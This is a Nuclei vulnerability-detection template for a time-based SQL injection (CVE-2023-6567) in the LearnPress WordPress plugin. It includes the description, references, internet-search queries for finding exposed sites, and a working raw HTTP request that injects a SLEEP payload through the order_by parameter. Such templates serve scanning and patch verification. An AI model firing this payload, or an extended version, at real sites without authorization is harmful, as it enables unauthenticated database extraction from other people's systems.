LearnPress <= 4.2.5.7 - SQL Injection
ID: CVE-2023-6567
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: time-based-sqli,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress
Description
Section titled “Description”The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_by’ parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
YAML Source
Section titled “YAML Source”id: CVE-2023-6567
info: name: LearnPress <= 4.2.5.7 - SQL Injection author: iamnoooob,rootxharsh,pdresearch severity: high description: | The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in version 4.2.5.8 reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6567 - https://plugins.trac.wordpress.org/changeset/3013957/learnpress - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ab578cd-3a0b-43d3-aaa7-0a01f431a4e2?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6567 cwe-id: CWE-89 epss-score: 0.00078 epss-percentile: 0.32303 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: thimpress product: learnpress framework: wordpress shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" tags: time-based-sqli,wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress
http: - raw: - | @timeout: 20s GET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and# digest: 4b0a00483046022100c382e158b10252c0b02d15af7560ad530639b513c823f230a5cbd8c034745eca022100b4a97d74319b886e2064b88945d0ac862bd064de7f3c9b42682ab779fcc382a1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6567.yaml"